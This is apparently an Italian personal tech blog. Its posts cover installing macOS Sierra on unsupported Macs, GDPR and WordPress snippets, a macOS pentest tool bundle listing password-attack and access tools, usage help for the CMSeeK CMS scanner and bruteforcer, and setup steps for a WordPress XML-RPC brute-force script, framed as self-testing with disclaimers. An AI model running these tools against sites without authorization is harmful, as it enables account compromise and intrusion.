Oggi e possibile grazie macOS Sierra Patch Tool

Dopo varie ricerce e sopratutto non volendo "gettare il mio Mac Book Pro 15'' del 2009", mi sono deciso a testare ed installare il macOS Sierra non ufficiale.
Dalla fine del 2009 in poi sfruttando un "hack" software è possibile forzare l'installazione del nuovo sistema operativo anche su Mac ufficialmente non supportati.

Premessa che: macOS Sierra è compatibile solo con i Mac prodotti a partire dalla fine del 2009 in poi, e quindi: MacBook (fine 2009 o seguenti), MacBook Pro (metà 2010 o più recente), MacBook Air (fine 2010 o più recente), Mac mini (metà 2010 o più recente), iMac (fine 2009 o più recente) e Mac Pro (metà 2010 o più recente).

Non averi mai pensato che potesse funzionare ma alla fine è andato tutto bene... e il mio Mac che sebrava obsoleto e ritronato a vivere.
(Consiglio di installare un nuovo hard disk SSD per avere maggiori prestazioni)

Grazie ad un hack software creato da DOSDude1 (Nick Name sviluppatore), è possibile forzare l’installazione del nuovo sistema anche su Mac ufficialmente non supportati, in particolare quelli con architettura Penryn, i processori Intel Core 2 duo come quelli presenti nei Mac Pro 2008 o seguenti, iMac e MacBook Pro fine 2008 o seguenti, MacBook Air o MacBook unibody inizio 2009 e seguenti, Xserve inizio 2008 e seguenti.

Guida all'istallazione:

MOLTO IMPORTANTE:

Prima di installare la nuova versione:
Assicurarsi che SIP sia disabilitato prima di installare Sierra.
Bisogna quindi avviare il Mac in modalità Recovery, arrivare alla schermata delle utility OS X e lanciare il Terminale.
A questo punto diamo prima il comando csrutil disable per disabilitare SIP e poi reboot per avviare il Mac.

 

 

 

UNA VOLTA FATTO SI PROCEDE

 

1) Scaricate l’applicazione “macOS Sierra Patch Tool” da questo indirizzo. L’applicazione è gratuita;
Controllare tutte le specifiche all'interno del sito, dato che qualche hardware potrebbe non funzionare correttamnte, ma ninete panico a tutto ce una soluzione (come il corretto funzionamento del WIFI gestibile con una chiavetta esterna dal costo di 10,00 Euro su Amazon)

2) Inserite la chiavetta USB nel Mac, aprite Utility Disco e inizializzate la chiavetta come “Mac OS esteso (Journaled)”.

3) Aprite l’applicazione “macOS Sierra Patcher”, individuate il file con l’installer di macOS Sierra scaricato dal Mac App Store (“Installa macOS Sierra”), fate click su “Open”. L’applicazione verifica l’integrità del file e compare una finestra dalla quale bisognerà scegliere il volume di destinazione sul quale copiare l’installer modificato (la chiavetta USB formattata al punto 2).

4) nella sezione “Volume” (l’icona a destra nella finestra) selezionate la chiavetta USB e fate click sul pulsante “Start Operation”. L’utility avvisa che tutto il contenuto della chiavetta sarà cancellato e chiede conferma prima di procedere. Facendo click su “Yes” bisognerà indicare la password dell’account amministratore e attendere la creazione della chiavetta di installazione. L’operazione potrebbe richiede anche 30 o più minuti (dipende dalla velocità della chiavetta, dal tipo, dall’USB usata, ecc.). Attendete pazientemente il termine dell’installazione (in fondo alla finestra appare la scritta “Complete!”)

5) Al termine della procedura è possibile smontare la chiavetta e inserirla per avviare il computer sul quale il sistema dovrà essere installato. Lasciate la chiavetta inserita in una porta USB, avviate il computer tenendo premuto il tasto ALT e, quando appare la finestra che chiede quale sistema avviare, selezionate la chiavetta USB con Sierra.

6) A questo punto è possibile procedere alla stregua di una qualsiasi altra installazione di macOS (è possibile inizializzare il disco destinazione e fare quanto altro permesso in questa fase).

7) Al termine dell’installazione è necessario partire ancora una volta dalla chiavetta USB (sempre tenendo premuto il tasto ALT all’avvio). Quando compare la schermata di benvenuto dell’installer, bisognerà portarsi sul menu “Utility”, scegliere la voce “macOS Post Install”, selezionare il Mac sul quale il sistema è stato installato e applicare la patch (tasto “Patch”) e riavviare il computer normalmente.

8) Il nuovo sistema sarà utilizzabile d’ora in poi anche su un Mac non ufficialmente non supportato. Se il sistema non si avvia, partite di nuovo con la chiavetta creata al punto 4, aprite ancora “Utility”, verificate di avere applicato la patch corretta, selezionate “Force cache rebuild” e provate a riavviare il computer normalmente.

 

 

Basta email spam da da domini dannosi esempio 80ro.eu

Questo sito stopforumspam.com ci premette di verificarfe online domini malevoli e tutte le l'oro email generate come ad esepio 80ro.eu

Un piccolo ma ottimo strumento di analisi!
Per il l'oro servizio svoloto meritano una piccola donazione ;-)

Quando la moda diventa digitale "Mojave 10.14"

Non è un caso che la Apple lancia il suo aggiornamento "Dark Mode"

E già da qualche anno che molti sviluppatori hanno implementato una nuova visione per i sistemi operativi Apple chiamata Dark Mode.
Come ad esempio nella versione OS X 10.10 Yosemite rimuovendo i colori vivaci della barra dei menu, dei sottomenu e del dock dell'applicazione, sostituendoli con il nero.
Quindi nulla di nuovo ma adesso totalamnte made in Apple ;-)
Parlare di Mojave solo per questa nuova funzionalità sarebbe troppo riduttivo.

Dalla Apple:
L'utilizzo di un Mac ha sempre ispirato un ottimo lavoro.
Ora macOS Mojave offre nuove funzionalità ispirate ai suoi utenti più potenti, ma pensate per tutti.
Mantieni la concentrazione sul tuo lavoro in modalità oscura.

Organizzare automaticamente i file usando Stacks.
Prendi più tipi di screenshot con meno sforzo.
Prova quattro nuove e pratiche app incorporate e scopri quelle nuove e fantastiche nel nuovo Mac App Store.
Ora puoi ottenere di più da ogni clic. (Dal sito della Apple)
No ci resta che provare ;-)

 

General Data Protection Regulation...

Il 25 Maggio 2018 entrerà in vigore il nuovo regolamento europeo generale sulla protezione dei dati denominato GDPR: General Data Protection Regulation.
Sarà applicato a tutti i tipi di imprese che offrono servizi o prodotti a persone che si trovano nel territorio dell’Unione Europea.
Considerando tale vasta applicazione della normativa e la frequenza con la quale la stampa, e i criminali informatici stessi, divulgano notizie riguardanti le perdite di dati sensibili.

Normativa giusta ma a mio dire scritta da burocrati che a livello tecnico non si rendono conto delle difficoltà che può comportare a livello di sviluppo web.

Ricordo che nella normativa Google Analytics se imposato con ID anonimo " ga('set', 'anonymizeIp', true);" viene considerato un cooki tecnico.
quindi esonerato dal consenso e quindi la disattivazione nella sua parte prima del consenso - vedi esempio:

 <script>
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
 ga('create', 'UA-00000000-0', 'auto');
 ga('set', 'anonymizeIp', true);
 ga('send', 'pageview');
</script>

Wordpress

WordPress grazie alla sua catena di sviluppatori a gia messo in piedi validi Pluign.
Il più valido per un sito non troppo corposo e "Ultimate GDPR Compliance Toolkit" a un costo di 19,00$ ma fa bene il suo lavoro.

Soddisfare TUTTI I REQUISITI GDPR, quali:
Accesso ai dati - Modulo dedicato per consentire agli utenti di accedere ai dati personali attualmente memorizzati,
Diritto di essere dimenticati - Modulo dedicato per gli utenti che richiedono la cancellazione dei dati memorizzati,
Sfoglia le richieste degli utenti per l'accesso / eliminazione dei dati e imposta notifiche e-mail personalizzate
Informativa sulla privacy: consente di impostare i reindirizzamenti per le pagine Termini e condizioni e Informativa sulla privacy fino a quando non viene fornito il consenso
Consensi sui cookie: crea una casella dedicata per il consenso sui cookie e blocca tutti i cookie fino a quando non viene fornito il consenso
Aggiungi automaticamente caselle di consenso per vari moduli sul tuo sito web
Violazione dei dati - inviare notifiche e-mail globali sulla violazione dei dati
Pseudonimizzazione - pseudonimizzazione di alcuni dati dell'utente memorizzati nel database.
Integrazioni predefinite per i più diffusi plugin WordPress come WooCommerce, Contact Form 7, Gravity Forms, Mailchimp, Events Manager, BuddyPress, Formidable Forms e molto altro!
Verifica i plugin attualmente attivati ​​per la conformità GDPR
Facile integrazione per plugin personalizzati
Gestisci tutto facilmente tramite il tuo pannello di amministrazione di WordPress
5 * Assistenza clienti
Documentazione online

ho avuto modo di testarlo e funziona molto bene.

Se non abbiamo troppe pretese per mini siti anche questo plugin è valito (Free): Cookie Notice 

 

Come rimuovere il meta Tag 'WP Bakery Page Builder'

Da inserire all'interno del file function.php; Sotto 3 metodi per escludere il meta tag.

 <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>

Remove VC Generator Option #1 Snippet:

add_action('wp_head', 'myoverride', 1);
function myoverride() {
  if ( class_exists( 'Vc_Manager' ) ) {
    remove_action('wp_head', array(visual_composer(), 'addMetaData'));
  }
} 

Remove VC Generator Option #2 Snippet:

 //remove a metatag (Powered by Visual Composer) from the wordpress
add_action('init', 'optimize_fixwp_head', 100);
function optimize_fixwp_head() {
 remove_action('wp_head', array(visual_composer(), 'addMetaData')); 
}

Remove VC Generator Option #3 Snippet:

 //remove vc generator
add_action('wp_head', 'novcgen', 1);
function novcgen() {
 if ( class_exists( 'Vc_Base' ) ) {
 remove_action('wp_head', array(visual_composer(), 'addMetaData'));
 }
}

Pentesting da Mac OS X

Molte delle persone che utilizzano Mac OS X e si dedicano al mondo della sicurezza dipendono dall'utilizzo di macchine virtuali per eseguire controlli. Di solito le persone scelgono sempre distribuzioni preparate con tutti i tipi di strumenti come Kali Linux o  Parrot Project

Queste distribuzioni ci danno la possibilità e la facilità di avere un sistema operativo pronto a fare ogni tipo di hacking e pentesting.
Altre persone scelgono di scegliere un sistema operativo Linux o Windows e installano solo gli strumenti che si sono abituati ai propri controlli.
Tuttavia, queste soluzioni richiedono che gli utenti di OS X dipendano da macchine virtuali.

È vero che esistono diversi programmi multipiattaforma per Windows, Linux e Mac OS X. Tuttavia, installare tutti questi programmi o prendere tutti i programmi offerti su Kali Linux Mac OS X richiede un ottimo lavoro.

Devi passare molto tempo a cercare ognuno dei programmi, anche se alcuni programmi non richiedono un'installazione complessa, per essere un semplice script in Python o in un'applicazione Java, molti altri richiedono la compilazione.
Questo è probabilmente il motivo principale per cui le persone usano le distribuzioni già preparate.
Da questa esigenza è nata l'idea di K0SASP.

 Che cos'è? 

Kontrol0-Security Software Pack Auditor, K0SASP nella sua abbreviazione, è un pacchetto di installazione che include un gran numero di programmi portati su Mac OS X, organizzati per categoria.

Senza la necessità di dover cercare e compilare.
Quando si installano alcuni degli strumenti necessari per controllare alcuni altri software di terze parti è necessario. Ad esempio nel caso del framework Metasploit è necessario che questo abbia precedentemente installato il pacchetto Xcode Command Line Tools. Questo software è installato di default quando si installa msf da K0SASP.

K0SASP facile installazione di tutti i programmi. Quando viene installato K0SASP, ed è selezionato alcuni altri programmi che richiedono queste dipendenze, vengono anche installati di default senza che l'utente debba fare nulla.
Con questo pacchetto, l'installazione di K0SASP esegue una serie di script che sono responsabili della distribuzione di ciascuna applicazione e installano tutte le dipendenze necessarie.
Una volta installato il software, possiamo avere una vasta gamma di possibilità per giocare con Hacking.

Che software include?

Attualmente l'ultima versione di K0SASP include software per analisi forense, web di Pentesting, sniffing, analisi di vulnerabilità, ecc.
Ogni programma che include l'installazione di K0SASP organizza le applicazioni in categorie in base alla loro funzionalità.

 

 

Elenco degli strumenti inclusi:

Information Gathering

✓ Amap
✓ Automater
✓ CaseFile
✓ arpscan
✓ dnmap
✓ Fierce
✓ GoLismero
✓ hping3
✓ Maltego Teeth
✓ masscan
✓ Nmap
✓ Zenmap
✓ know-scan
✓ Recon-ng
✓ theHarvester
✓ URLCrazy

Network Tools

✓ Autossh
✓ SET
✓ Exploit pack
✓ search-exploits

Forensics Tools

✓ pdf-parser
✓ pdfid
✓ peepdf
✓ OSXAuditor-master
✓ Binary Cookie reader

Web Applications

✓ Burp Suite
✓ nikto
✓ DirBuster
✓ fimap
✓ jSQL
✓ sqlmap
✓ Vega
✓ Wfuzz
✓ mitmproxy
✓ mitmdump
✓ zaproxy
✓ webscarab
✓ wapiti
✓ SQL injector

Stress Testing

✓ SlowHTTPTest
✓ THC-SSL-DOS

Sniffing & Spoofing

✓ Cocoa Packect Analyzer
✓ sslstrip
✓ Wireshark
✓ tcpdump

Password Attacks

✓ crunch
✓ hash-identifier
✓ THC-Hydra
✓ pw-inspector
✓ John the Ripper
✓ Ncrack
✓ phrasendrescher
✓ RSMangler
✓ pipal

Maintaining Access

✓ tunna
✓ sbd
✓ Weevely

Reporting Tools

✓ KeepNote
✓ MagicTree

 

Attualmante aspettiamo l'ultima versione più attuale... k0sasp download

 

CMSeeK v1.1.2 - CMS Detection And Exploitation Suite - Scansione di WordPress, Joomla, Drupal e oltre 170 altri CMS
8:52 AM | POST SPONSORIZZATO DA FARADAYSEC | AMBIENTE MULTIUTENTE PENTEST
ZION3R
Facebook

Cos'è un CMS?
Un sistema di gestione dei contenuti (CMS) gestisce la creazione e la modifica di contenuti digitali. In genere supporta più utenti in un ambiente collaborativo. Alcuni esempi notevoli sono: WordPress, Joomla, Drupal ecc .

Faraday

Cronologia delle versioni
- Version 1.1.2 [19-05-2019]
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...
Funzioni del file Changelog

di CMSeek:
Rilevazione CMS di base di oltre 170 CMS
Rilevamento della versione di Drupal
Scansioni Wordpress avanzate
Rileva la versione
Enumerazione utente
Enumerazione di plug-in
Enumerazione dei temi
Rileva gli utenti (3 metodi di rilevamento)
Cerca le vulnerabilità della versione e molto altro!
Scansioni avanzate di Joomla
Rilevamento della versione
Trova file di backup
Cercatore di pagine di amministrazione
Rilevamento vulnerabilità principale
Controllo elenco directory
Config rilevamento perdite
Varie altre verifiche

Sistema modulare bruteforce
Usa i moduli bruteforce pre-creati o creane uno tuo e integralo con esso

Requisiti e compatibilità:
CMSeeK è costruito usando python3 , avrete bisogno di python3 per eseguire questo strumento ed è compatibile con i sistemi basati su Unix sin d'ora. Il supporto di Windows verrà aggiunto in seguito. CMSeeK si affida a git per l'aggiornamento automatico, quindi assicurati che git sia installato.

Installazione e utilizzo:
È abbastanza facile usare CMSeeK, assicurati di avere python3 e git (solo per la clonazione del repository) installati e usa i seguenti comandi:
git clone https://github.com/Tuhinshubhra/CMSeeK
cd CMSeeK
pip / pip3 installa -r requirements.txt
Per la scansione guidata:
python3 cmseek.py
Altro:
python3 cmseek.py -u <target_url> [...]
Menu Aiuto dal programma:
USAGE:
python3 cmseek.py (for guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, --list LIST Path of the file containing list of sites
for multi-site scan (comma separated)

MANIPULATING SCAN:
-i cms, --ignore--cms cms Specify which CMS IDs to skip in order to
avoid flase positive. separated by comma ","

--strict-cms cms Checks target against a list of provided
CMS IDs. separated by comma ","

--skip-scanned Skips target if it's CMS was previously detected.

RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)

USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent

OUTPUT:
-v, --verbose Increase output verbosity

VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit

HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result

EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

Verifica dell'aggiornamento:
è possibile controllare l'aggiornamento dal menu principale o utilizzarepython3 cmseek.py --updateper verificare l'aggiornamento e applicare l'aggiornamento automatico.
PS: assicurati di averlogitinstallato, CMSeeK usa git per applicare l'aggiornamento automatico.

Metodi di rilevamento:
CMSeek rileva CMS tramite quanto segue:
Intestazioni HTTP
Meta tag generatore
Codice sorgente della pagina
robots.txt

CMS supportati:
CMSeeK attualmente può rilevare più di 170 CMS. Controlla qui la lista:file cmss.py che è presente nellacmseekdbdirectory. Tutti i cms sono memorizzati nel seguente modo:
cmsID = {
'name':'Name Of CMS',
'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}

Risultato scansione:
tutti i risultati della scansione sono memorizzati in un file JSON denominatocms.json, è possibile trovare i registri all'interno dellaResult\<Target Site>directory e, dal momento che i risultati bruteforce sono memorizzati in un file txt sotto la directory dei risultati del sito.

Ecco un esempio del registro dei rapporti di JSON:

 

Moduli Bruteforce:
CMSeek ha un sistema modulare bruteforce che significa che puoi aggiungere i tuoi moduli bruteforce personalizzati per lavorare con cmseek. Una documentazione adeguata per la creazione di moduli verrà creata a breve, ma nel caso in cui tu abbia già capito come (abbastanza facile una volta analizzati i moduli pre-fatti) tutto ciò che devi fare è questo:
Aggiungi un commento esattamente come questo . Ciò aiuterà CMSeeK a conoscere il nome del CMS usando regex# <Name Of The CMS> Bruteforce module
Aggiungi un altro commento ### cmseekbruteforcemodule, questo aiuterà CMSeeK a sapere che è un modulo
Copia e incolla il modulo nella brutecmsdirectory sotto la directory di CMSeeK
Apri CMSeeK e ricostruisci cache usando Rcome input nel primo menu.
Se tutto è fatto bene vedrai qualcosa di simile a questo (fai riferimento allo screenshot qui sotto) e il tuo modulo sarà elencato nel menu bruteforce la prossima volta che aprirai CMSeeK.

Hai bisogno di più motivi per usare CMSeeK?
Se non puoi goderti sempre l'uscita dal CMSeeK (per favore non farlo) , ti saluterà in un messaggio di addio casuale in varie lingue.
Inoltre puoi provare a leggere i commenti nel codice che sono piuttosto casuali e bizzarri !!!

Screenshots:
Menu principale

Risultato della scansione

Risultato scansione WordPress

Linee guida per l'apertura di un problema:
assicurati di avere le seguenti informazioni allegate all'apertura di un nuovo problema:
Bersaglio
Copia esatta dell'errore o screenshot dell'errore
Il tuo sistema operativo e la versione di Python

Problemi senza queste informazioni potrebbero non avere risposta!

Dichiarazione di non responsabilità: l'utilizzo di K0SASP per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

 

Cosa cambia per i consumatori nella nuova normativa Europea?

All'interno del regolamento Europeo c’è la possibilità di conoscere i dati forniti e di revocarli, l’obbligo di un linguaggio chiaro e senza tecnicismi e anche l’onere per le aziende di comunicare eventuali violazioni, cosa che a oggi non ce...

Dal 25 maggio sarà direttamente applicabile il nuovo regolamento europeo sulla privacy Ue 2016/679 - entrato in vigore il 24 maggio 2016 - che porterà grosse modifiche alle norme che finora hanno regolato questa materia in tutti gli stati dell’Unione europea, Italia compresa.

A cambiare saranno le leggi che chiunque maneggi dati personali dovrà rispettare per poter continuare a farlo. Come le società di telefonia, le pubbliche amministrazioni e qualsiasi azienda con cui sottoscriviamo un contratto in cui inseriamo i nostri dati personali, comprese quelle attive solo in Rete come i social network.

Ma la norma interessa anche e soprattutto noi consumatori, visto che tra circa tre mesi, tutti i soggetti cui abbiamo comunicato il nostro nome, indirizzo o numero di telefono saranno chiamati a migliorare il modo in cui trattano e conservano i nostri dati personali. Il regolamento introduce, infatti, regole più chiare in materia di informativa e consenso, definisce i limiti al trattamento automatizzato dei dati personali, e stabilisce anche criteri (e sanzioni) rigorosi nei casi di violazione dei dati personali (data breach). Vediamo nello specifico che cosa cambia.

Dati a scadenza

Una novità a beneficio dei consumatori è il principio di “retentio”. Cosa significa? Quando firmiamo un contratto, i dati che forniamo alle imprese non sono di loro proprietà per sempre. Il regolamento introduce infatti il concetto di scadenza dei dati.

Addio al consenso senza specifiche.
Con la nuova normativa le aziende dovranno chiedere il consenso non solo all’uso dei nostri dati, ma dovranno specificare anche l’utilizzo che ne faranno, distinguendo, per esempio, se il fine è quello di marketing, di profilazione, di geolocalizzazione, o altro. Ogni tipo di “attività di trattamento” implicherà perciò un consenso specifico che il consumatore sarà chiamato a firmare, mettendo così fine alle informative “cumulative” in cui un’unica firma autorizzava più utilizzi. “In questo modo – precisa il legale - gli utenti non potranno più trovarsi inscritti a cose che non vogliono o a cui non hanno dato lo specifico consenso. È esclusa inoltre ogni forma di consenso tacito a favore delle sole forme esplicite”.

Il diritto di conoscere i propri dati.
È capitato quasi a tutti: continuiamo a ricevere email o messaggi da servizi che non ricordiamo di aver richiesto e temiamo di avergli fornito anche dati sensibili come il nostro numero di telefono. Finora una situazione come questa poteva essere quasi irrisolvibile. Oggi invece con il nuovo regolamento che sancisce il diritto di accesso, tutti i consumatori potranno rivolgersi alle società chiedendo che gli vengano forniti i dettagli sui dati che hanno comunicato loro, chiedendo anche di chiarire come vengono trattati e come sono stati ottenuti. Le aziende, dal canto loro, saranno soggette all’obbligo di risposta. Ma come farlo concretamente? Secondo Pikler, il modo migliore è “quello di rivolgersi al soggetto inviandogli una comunicazione di cui resta traccia come una raccomandata o una email con posta certificata. Nei casi estremi ci si può anche rivolgere alla Guardia di finanza dove è stato istituito un nucleo ad hoc sui temi privacy”.

… e di cancellarli o limitarne il trattamento.
Oltre a conoscere i dati forniti, i consumatori potranno anche chiederne la cancellazione o limitarne il trattamento. “Si tratta di un nuovo diritto – aggiunge l’avvocato - offerto ai cittadini e può essere esercitato non solo in caso di violazione dei presupposti di liceità del trattamento, ma anche se il consumatore chiede la rettifica dei dati o si oppone al loro trattamento”.

Linguaggio semplice e chiaro.
Una delle novità più applaudite del nuovo Regolamento è il fatto che dal 25 maggio le aziende che vogliono detenere e usare i nostri dati dovranno chiedercelo con un linguaggio chiaro e comprensibile, senza vocaboli tecnici o giuridici. Il senso è quello di consentire a tutti di capire l’informativa. Per questo motivo saranno bandite anche le clausole tecniche e quelle scritte in caratteri troppo piccoli. “In pratica le aziende e gli enti pubblici dovranno dimostrare di aver ricevuto un’autorizzazione al trattamento dei dati, in maniera inequivocabile e comprensibile per l’interessato”, precisa Pikler.

Più ampio diritto all’oblio.
La legge estende anche il campo del cosiddetto diritto all’oblio: la norma che sancisce la possibilità di essere cancellati dalle notizie e anche dai motori di ricerca qualora il motivo che ha reso legittima la pubblicazione di quel dato non sia più di pubblica utilità (come, per esempio, nel caso di una persona che è stata assolta da un’accusa di cui i giornali e le testate online avevano dato notizia). Con il nuovo regolamento questo diritto amplia il proprio significato e si estende anche ai casi in cui un consumatore chiede la cancellazione dei suoi dati personali e quindi la revoca del trattamento concesso per avere un determinato servizio.

Principio di accountability.
“Con il nuovo Regolamento viene finalmente definito un principio già riconosciuto dal Garante: quello che prevede che sia responsabilità del possessore dei dati sensibili conservarli in maniera corretta”, rivela l’avvocato. Il principio di accountability sancisce perciò che sarà onere dell’azienda o dell’ente che ha i nostri dati dimostrare un “atteggiamento proattivo nella salvaguardia del dato personale dell’utente”. Si tratta di una norma che riguarda soprattutto i casi di violazioni (data breach) e che chiama quindi in causa la responsabilità di chi li detiene, e non di chi li ha forniti.

Sanzioni.
Una delle più grandi novità del regolamento è quella che riguarda i casi di data breach: le violazioni dei dati, per esempio in caso di attacchi informatici o furti. La norma introduce infatti il diritto per tutti i cittadini, siano essi aziende o persone fisiche, di conoscere la violazione dei dati che le aziende saranno obbligate a comunicare al Garante. Per i trasgressori le sanzioni, applicabili dal 25 maggio 2018, arriveranno fino a 20 milioni di euro o al 4% del fatturato.

Più tutele per i minori.
Maggiori tutele anche per i minori. “In particolare, per i minori di 16 anni sarà necessaria anche l’autorizzazione del genitore o di chi ne abbia la potestà”, conclude Pikler. Una regola, quest’ultima, che varrà anche per i servizi su Internet e per i social media.

Fonte la www.repubblica.it

 

XML-RPC Wordpress

Premessa:
Dopo aver subito vari attacchi via XML-RPC con esito negativo (Grazie a WP aggiornato e a qualche accorgimento), voglio condividere con voi questo articolo.

XML-RPC  è una chiamata di procedura remota (RPC) che consente le  chiamate XML codificate che vengono trasportate tramite il protocollo HTTP.
Questo sistema semplifica l'inserimento di contenuti da remoto, rendendo semplice la pubblicazione di un grande volume di dati in una singola operazione tramite XML-RPC.

Questa particolarità e poi stata sfruttata dagli hacker nelle versioni di Wordpress antecedenti la 4.4.1 per effettuare un attacco brute force, 
che consiste nel provare una serie innumerevole di password per poter entrare nel sistema tramite  login.

Per contrastare questo tipo di attacco, oltre aggiornare il nostro Wordpress alla versione più recente rispetto la 4.4.1 in giu, utilizzare un utile plugin anche nella versione free - Ithemes un valido strumento semplice da usare è molto efficace.

Una delle sue caratteristiche che lo contraddistinguono sono la semplicità d'uso e sopratutto la sua forza nella sicurezza.
Una delle sue funzioni utili che ci eviteranno l'attacco brute force di password sarà limitare il numero di immissione di password nel login.
Una volta impostato tutti coloro che tenteranno di forzare il login con pass errate (a secondo della vostra impostazione) verranno bloccati e sarà registrato il loro IP Host che di seguito potremo bloccare definitivamente e monitorare.  Potremo anche fare in modo che il login avvenga solo da un IP cioè il nostro. Ci sono diversi sitemi per evitare questo tipo di attacco, questo è uno dei tanti.

Altro strumento ma apagamento e Bitninja server security

Protezione all-in-one
BitNinja combina il più potente software di sicurezza server in una suite di protezione facile da usare. Ottieni protezione completa contro XSS, DDoS, malware, scansioni, script injection, enumerazione, forza bruta e altri attacchi automatici - su tutti i principali protocolli, non solo su HTTP.

 

 

Ho avuto modo di testarlo, ottimo! (ma approfondiremo in seguito)

Strumento di test: Wordpress-XMLRPC-Brute-Force-Exploit

Questo software ci permettere di verificare il livello di rischio del nostro Sistema WP. tramite un brute force via XML-RPC
Link: https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit
Install via termiale:

Apri una finestra di terminale e fai il cd ovunque tu abbia scaricato il file, quindi decomprimi i file in posizione:

decomprimere Wordpress-XMLRPC-Brute-Force-Exploit-master.zip

Quindi cambia in quella directory:

cd Wordpress-XMLRPC-Brute-Force-Exploit-master

Mentre sei lì, non ti farà male cambiare le autorizzazioni sul file Python per assicurarci di non incappare in alcun problema nell'esecuzione. Il "7" che stai assegnando significa che sarai in grado di fare tutto ciò che vuoi con il file.

chmod 755 wordpress-xmlrpc-brute.py

Ora esegui da solo il comando Python e dai un'occhiata alle istruzioni.

./wordpress-xmlrpc-brute.py

 

 

NB. in conclusione:

La protezione dalla vulnerabilità XML-RPC è semplice e le versioni più recenti non includono affatto la funzionalità. Detto questo, molti strumenti di pubblicazione di WordPress di terze parti come Jetpack e app per smartphone come IFTTT potrebbero richiedere l'uso di XML-RPC, quindi anche alcune installazioni di WordPress sono state aggiornate con il codice vulnerabile e sono quindi pronte all'intrusione.

Controlla le tue installazioni WordPress e assicurati che, se integri un nuovo strumento che consente l'interazione con WP da un punto di vista remoto, non hai aperto la porta all'intrusione di XML-RPC o di altre intrusioni.
Questa è una delle molte vulnerabilità di WordPress e questo semplice attacco di script è un buon punto di partenza per la tua ricerca.

Potremmo includere questo script all'interno del file function.php:

 

function Remove_Unneeded_XMLRPC( $methods ) {
 unset( $methods['wp.getUsersBlogs'] );
 return $methods;
}
add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

Dichiarazione di non responsabilità: l'utilizzo di XMLRPC Brute Force Exploit per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

Più di una semplice raccolte di librerie JS

Questo progetto è indubbiamente una miniera d'oro per un web designer e developer.
Una suite di librerie e strumenti modulari che lavorano insieme o in modo indipendente per abilitare ricchi contenuti interattivi su tecnologie web aperte tramite HTML5.

EaselJS

Una libreria JavaScript che facilita il lavoro con l'elemento Canvas HTML5.
Utile per creare giochi, arte generativa e altre esperienze altamente grafiche.

EaselJS offre soluzioni dirette per lavorare con grafica ricca e interattività con HTML5 Canvas.
Fornisce un'API che è familiare agli sviluppatori Adobe Animate, ma abbraccia la sensibilità JavaScript.
Consiste in un elenco di visualizzazione completo, gerarchico, un modello di interazione core e classi helper per semplificare il lavoro con Canvas.

TWEEN JS

Una libreria JavaScript semplice ma potente per il tweening e l'animazione di proprietà HTML5 e JavaScript.
Funziona stand-alone o integrato con EaselJS.

TweenJS è una libreria di tweening semplice da utilizzare in JavaScript.
È stato sviluppato per integrarsi bene con la libreria EaselJS, ma non è dipendente o specifico. Supporta il tweening di entrambe le proprietà degli oggetti numerici e le proprietà di stile CSS. L'API è semplice ma molto potente, facilitando la creazione di interpolazioni complesse concatenando comandi.

SOUND JS

Una libreria JavaScript che fornisce una semplice API e potenti funzionalità per semplificare il lavoro con l'audio.
Si collega facilmente il caricamento del file audio a PreloadJS.

SoundJS riassume l'implementazione del suono HTML5, rendendo molto più semplice l'aggiunta di suoni cross-browser coerenti ai tuoi giochi o esperienze ricche.
È possibile richiedere le funzionalità, quindi specificare e assegnare la priorità a quali API, plug-in e funzionalità vengono sfruttati per dispositivi o browser specifici. 

PRECARICO JS

Una libreria JavaScript che consente di gestire e coordinare il caricamento di risorse e dati.

PreloadJS facilita il precaricamento delle risorse: immagini, suoni, JS, caratteri, testo e altro.
Usa XHR2 per fornire informazioni di progresso reali quando disponibili, o ricade per taggare il caricamento e agevolare il progresso quando non lo è.
Consente più code, più connessioni, interrompendo code e molto altro.

 

Considerando che è sponsorizzato da Adobe, Microsoft, Mozzilla e Gskinner

Se ne vedranno delle belle!!!!

"rogueads.unwanted_ads" su WP come rimuoverlo

La mia esperienza mi ha portato a scrivere questo post, per aiutarvi nella prevenzione ed eliminazione di fiale malevoli Malware che potrebbero compromettere il vostro WordPress, sia nel sistema che nel Posizionamento su Google e altri motori di ricerca.

Oggi ne andremo ad analizzare uno in particolare, molto comune in Wordpress “rogueads.unwanted_ads”

